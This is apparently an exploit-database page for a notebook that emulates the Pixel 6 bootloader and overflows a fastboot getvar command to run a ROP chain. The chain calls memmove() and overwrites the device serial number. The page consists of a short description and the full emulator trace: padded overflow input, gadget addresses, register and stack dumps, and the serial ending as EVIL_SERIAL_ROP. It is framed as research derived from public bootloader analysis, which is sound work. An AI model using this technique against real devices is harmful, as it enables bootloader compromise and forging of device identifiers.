Share
## https://sploitus.com/exploit?id=FDF8A206-EAB1-5C03-BF73-61095BBB3EEA
# Updating ABL serial with ROP:
When ran this notebook will load ABL and attempt to update the device's serial number via ROP chain to call memmove(). Derived from eShard's https://github.com/eshard/pixel6-boot/blob/main/run_abl_public.ipynb whilst following along with https://eshard.com/posts/pixel6_bootloader
# Output
```
partition misc not found
failed to read misc(vendor) partition -2
[ 0.000000] [E] [PXL] could not get charger state -27
[ 0.000000] [I] [PXL] boot voltage threshold=3400mV
##### INTERRUPT
0xffff0000f880d3e0: mov x20, x0
^ Got interrupt 0d ffff0000f880d3e0. Skipping instruction.
start_app hook:
0xffff0000f88105a0: ret
fastboot_menu_start hook:
0xffff0000f887be94: ret
>>> fastboot_read:
[ 0.000000] [I] [FB] Accept cmd:flashing unlock
<<< INFOdevice already unlocked
<<< OKAY
>>> fastboot_read:
[ 0.000000] [I] [FB] Accept cmd:oem dmesg
<<< OKAY
>>> fastboot_read:
[ 0.000000] [I] [FB] Accept cmd:getvar:serialno
<<< OKAYDAAAAABBBBAAAAAA
>>> fastboot_read:
[ 0.000000] [I] [FB] Accept cmd:
<<< FAILvariable (serialnoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>>> Exiting
0xffff0000f8815a84: mov sp, x29
0xffff0000f8815a88: ldp x20, x19, [sp, #0x30]
0xffff0000f8815a8c: ldp x22, x21, [sp, #0x20]
0xffff0000f8815a90: ldp x24, x23, [sp, #0x10]
0xffff0000f8815a94: ldp x29, x30, [sp], #0x40
0xffff0000f8815a98: ret
## REGISTERS ##
X0 - 0
X1 - 40
X2 - FFFF0001047FEEF0
X3 - 0
X8 - 0
X19 - DEADBEEFDEADBE19
X20 - DEADBEEFDEADBA20
X21 - 4343434343434343
X22 - 4343434343434343
X23 - 4343434343434343
X24 - 4343434343434343
X28 - 0
X29 - 4444444444444444
X30 - FFFF0000F880C924
SP - FFFF000090700040
PC - FFFF0000F8815A98
## STACK DUMP ##
SP: ffff000090700040
@ffff000090700040 deadbeefdeadbe29 - #0
@ffff000090700048 ffff0000f8884684 - #8
@ffff000090700050 deadbeefdeadbe24 - #10
@ffff000090700058 ffff000090700070 - #18
@ffff000090700060 ffff0000f887e2d4 - #20
@ffff000090700068 ffff0000f8ac0058 - #28
@ffff000090700070 10 - #30
@ffff000090700078 deadbeefdeadb119 - #38
@ffff000090700080 ffff000090700090 - #40
@ffff000090700088 ffff0000f886fb88 - #48
Checking serial: DAAAAABBBBAAAAAA
0xffff0000f880c924: ldp x20, x19, [sp, #0x30]
0xffff0000f880c928: ldp x22, x21, [sp, #0x20]
0xffff0000f880c92c: ldp x24, x23, [sp, #0x10]
0xffff0000f880c930: ldp x29, x30, [sp], #0x40
0xffff0000f880c934: ret
## REGISTERS ##
X0 - 0
X1 - 40
X2 - FFFF0001047FEEF0
X3 - 0
X8 - 0
X19 - DEADBEEFDEADB119
X20 - 10
X21 - FFFF0000F8AC0058
X22 - FFFF0000F887E2D4
X23 - FFFF000090700070
X24 - DEADBEEFDEADBE24
X28 - 0
X29 - DEADBEEFDEADBE29
X30 - FFFF0000F8884684
SP - FFFF000090700080
PC - FFFF0000F880C934
## STACK DUMP ##
SP: ffff000090700080
@ffff000090700080 ffff000090700090 - #0
@ffff000090700088 ffff0000f886fb88 - #8
@ffff000090700090 5245535f4c495645 - #10
@ffff000090700098 504f525f4c4149 - #18
@ffff0000907000a0 0 - #20
@ffff0000907000a8 0 - #28
@ffff0000907000b0 0 - #30
@ffff0000907000b8 0 - #38
@ffff0000907000c0 0 - #40
@ffff0000907000c8 0 - #48
Checking serial: DAAAAABBBBAAAAAA
0xffff0000f8884684: ldr x1, [x23, #0x10]
0xffff0000f8884688: mov x0, x21
0xffff0000f888468c: mov x2, x20
0xffff0000f8884690: blr x22
## REGISTERS ##
X0 - FFFF0000F8AC0058
X1 - FFFF000090700090
X2 - 10
X3 - 0
X8 - 0
X19 - DEADBEEFDEADB119
X20 - 10
X21 - FFFF0000F8AC0058
X22 - FFFF0000F887E2D4
X23 - FFFF000090700070
X24 - DEADBEEFDEADBE24
X28 - 0
X29 - DEADBEEFDEADBE29
X30 - FFFF0000F8884684
SP - FFFF000090700080
PC - FFFF0000F8884690
## STACK DUMP ##
SP: ffff000090700080
@ffff000090700080 ffff000090700090 - #0
@ffff000090700088 ffff0000f886fb88 - #8
@ffff000090700090 5245535f4c495645 - #10
@ffff000090700098 504f525f4c4149 - #18
@ffff0000907000a0 0 - #20
@ffff0000907000a8 0 - #28
@ffff0000907000b0 0 - #30
@ffff0000907000b8 0 - #38
@ffff0000907000c0 0 - #40
@ffff0000907000c8 0 - #48
Checking serial: DAAAAABBBBAAAAAA
0xffff0000f887e2d4: bl #0xffff0000f8876b58
## REGISTERS ##
X0 - FFFF0000F8AC0058
X1 - FFFF000090700090
X2 - 10
X3 - 0
X8 - 0
X19 - DEADBEEFDEADB119
X20 - 10
X21 - FFFF0000F8AC0058
X22 - FFFF0000F887E2D4
X23 - FFFF000090700070
X24 - DEADBEEFDEADBE24
X28 - 0
X29 - DEADBEEFDEADBE29
X30 - FFFF0000F8884694
SP - FFFF000090700080
PC - FFFF0000F887E2D4
## STACK DUMP ##
SP: ffff000090700080
@ffff000090700080 ffff000090700090 - #0
@ffff000090700088 ffff0000f886fb88 - #8
@ffff000090700090 5245535f4c495645 - #10
@ffff000090700098 504f525f4c4149 - #18
@ffff0000907000a0 0 - #20
@ffff0000907000a8 0 - #28
@ffff0000907000b0 0 - #30
@ffff0000907000b8 0 - #38
@ffff0000907000c0 0 - #40
@ffff0000907000c8 0 - #48
Checking serial: DAAAAABBBBAAAAAA
0xffff0000f887e2d8: mov w0, wzr
0xffff0000f887e2dc: ldp x29, x30, [sp], #0x10
0xffff0000f887e2e0: ret
## REGISTERS ##
X0 - 0
X1 - FFFF000090700090
X2 - 10
X3 - 0
X8 - FFFF0000F8AC0058
X19 - DEADBEEFDEADB119
X20 - 10
X21 - FFFF0000F8AC0058
X22 - FFFF0000F887E2D4
X23 - FFFF000090700070
X24 - DEADBEEFDEADBE24
X28 - 0
X29 - FFFF000090700090
X30 - FFFF0000F886FB88
SP - FFFF000090700090
PC - FFFF0000F887E2E0
## STACK DUMP ##
SP: ffff000090700090
@ffff000090700090 5245535f4c495645 - #0
@ffff000090700098 504f525f4c4149 - #8
@ffff0000907000a0 0 - #10
@ffff0000907000a8 0 - #18
@ffff0000907000b0 0 - #20
@ffff0000907000b8 0 - #28
@ffff0000907000c0 0 - #30
@ffff0000907000c8 0 - #38
@ffff0000907000d0 0 - #40
@ffff0000907000d8 0 - #48
Checking serial: EVIL_SERIAL_ROP
>>> PC = 0x0
```